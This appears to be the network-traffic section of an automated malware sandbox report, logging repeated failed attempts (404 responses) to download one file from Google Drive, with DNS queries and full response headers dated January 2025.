      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficHTTP traffic detected: GET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6MDHQ11rPu1adBbHNkRayT-uroBYsCNflam6rz9IHkAO_KzEyDBJqdZn4d52xK9kLN-mrz51UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:59 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-QRH0QhO-P5se56J6v6NGyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi; expires=Sat, 12-Jul-2025 14:16:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ6BhDpkV-D47NIWF0-Ojw0sI9rWVmwb9i0W_PbqZSxqMrdsHEJYI-tvEt5tWGqq6MKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:03 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-gTuLSh2rz4pzG4Zk2X10ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5JD61p-3jHVETiBQwQs1VdrMBP95nXD9sjHgdSmmuisaEFojM56f9ALz3swoaf351z0tRu03QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:05 GMTContent-Security-Policy: script-src 'nonce-_lIDVz7X4GZ-V5juSLMypQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6wFiivyFR-jzU_7D4PVCfCqCve-wMA0xiI0DibY0iQlVikRIj5p5LpRyQE1iy6ThheSIncrRsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-LN5e9uG0OIcbfAkHIs1wXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC51A7hdGhdBtxevsupkliTbPUfXTEiuiE5W4peFggR395VIwxZtdQzdGTdVNikZhNMpContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-wfHNKyHDkVHfbt07Qisp4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRAYTFkUW16vrpsJjmJVJfjoR_qIoG6I3L26az4tMRW66segR7eCb1MxpVkKHVdbpB-Y0NavGkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:12 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZuiuguO_nuj0AxguTa4gxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
